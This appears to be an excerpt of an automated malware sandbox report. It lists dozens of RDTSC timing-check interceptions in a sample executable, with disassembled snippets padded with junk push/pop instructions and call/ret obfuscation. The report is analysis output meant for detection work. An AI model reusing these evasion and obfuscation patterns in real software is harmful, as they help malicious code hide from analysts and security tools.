                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE055 second address: 4BE09A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB583h 0x00000007 jmp 00007FA49CDAB583h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FA49CDAB587h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5D39 second address: 4C5D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5D3E second address: 4C5D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB582h 0x00000009 je 00007FA49CDAB576h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5FDF second address: 4C5FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C57AB second address: 4C57BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C57BA second address: 4C57C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF757 second address: 4CF763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF763 second address: 4CF767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF915 second address: 4CF91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA80 second address: 4CFA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA88 second address: 4CFA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFA8C second address: 4CFAB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 jmp 00007FA49D1B33CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA49D1B33C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFAB1 second address: 4CFABB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA49CDAB576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0143 second address: 4D0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0147 second address: 4D016A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jo 00007FA49CDAB576h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 jmp 00007FA49CDAB57Ah 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D066D second address: 4D0673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C5 second address: 4D30E0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA49CDAB57Eh 0x00000008 jnc 00007FA49CDAB576h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnl 00007FA49CDAB57Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2C7A second address: 4D2C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2C96 second address: 4D2CAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2CAB second address: 4D2CC9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA49D1B33D2h 0x00000008 jmp 00007FA49D1B33CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jg 00007FA49D1B33C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5A40 second address: 4D5A6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA49CDAB580h 0x0000000c jmp 00007FA49CDAB585h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAAAF second address: 4DAABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAF33 second address: 4DAF3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAF3B second address: 4DAF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB201 second address: 4DB233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49CDAB578h 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FA49CDAB583h 0x00000012 jmp 00007FA49CDAB57Bh 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB233 second address: 4DB247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FA49D1B33C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FA49D1B33CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB247 second address: 4DB24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB24F second address: 4DB253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6A6 second address: 4DE6B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6B0 second address: 4DE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6CA second address: 4DE6DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6DA second address: 4DE6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA49D1B33CBh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE11 second address: 4DDE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA49CDAB576h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA49CDAB586h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE35 second address: 4DDE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDE3A second address: 4DDE69 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA49CDAB57Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f jnc 00007FA49CDAB582h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDE69 second address: 4DDE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0F6 second address: 4DE102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE102 second address: 4DE106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE106 second address: 4DE10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2B1F second address: 4E2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2DD6 second address: 4E2DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2F44 second address: 4E2F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A353 second address: 48A358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A358 second address: 48A35E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A35E second address: 48A362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A362 second address: 48A366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A366 second address: 48A3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA49CDAB57Ah 0x0000000e nop 0x0000000f mov dh, bh 0x00000011 mov ebx, dword ptr [ebp+1247B4CFh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FA49CDAB578h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 add eax, ebx 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FA49CDAB578h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d cld 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FA49CDAB587h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A3E5 second address: 48A453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FA49D1B33C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D26CBh], ecx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FA49D1B33C8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 sub dword ptr [ebp+122D34DEh], ecx 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FA49D1B33CFh 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A453 second address: 48A465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FA49CDAB576h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A465 second address: 48A469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E31D5 second address: 4E31D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3B8F second address: 4E3B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3B93 second address: 4E3BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FA49CDAB576h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3BA1 second address: 4E3BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E61D5 second address: 4E61E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA49CDAB57Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E61E7 second address: 4E6204 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA49D1B33C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FA49D1B33CFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6204 second address: 4E6208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6208 second address: 4E620E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED1B3 second address: 4ED1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED1B7 second address: 4ED1D7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED1D7 second address: 4ED1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA49CDAB57Eh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB2D8 second address: 4EB2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB449 second address: 4EB44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB44D second address: 4EB453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB453 second address: 4EB477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB8C2 second address: 4EB8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FA49D1B33C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC393 second address: 4EC39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA49CDAB576h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECC8D second address: 4ECC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECC93 second address: 4ECC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECC97 second address: 4ECC9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECC9D second address: 4ECCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECCA1 second address: 4ECCB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1918 second address: 4F1922 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49CDAB57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1922 second address: 4F1936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49D1B33C8h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1936 second address: 4F1940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5481 second address: 4F5488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F465F second address: 4F4663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F490F second address: 4F4913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4A84 second address: 4F4A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4A88 second address: 4F4A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FA49D1B33C6h 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4A9E second address: 4F4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4AAE second address: 4F4AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4C1C second address: 4F4C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4D28 second address: 4F4D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33CFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5065 second address: 4F506D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBC36 second address: 4FBC50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0A1 second address: 4FC0D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB588h 0x00000008 jmp 00007FA49CDAB580h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FA49CDAB586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC257 second address: 4FC267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jo 00007FA49D1B33E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC267 second address: 4FC27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC39D second address: 4FC3BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA49D1B33D2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC7D7 second address: 4FC7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC7DB second address: 4FC801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA49D1B33C8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA49D1B33D4h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC801 second address: 4FC810 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
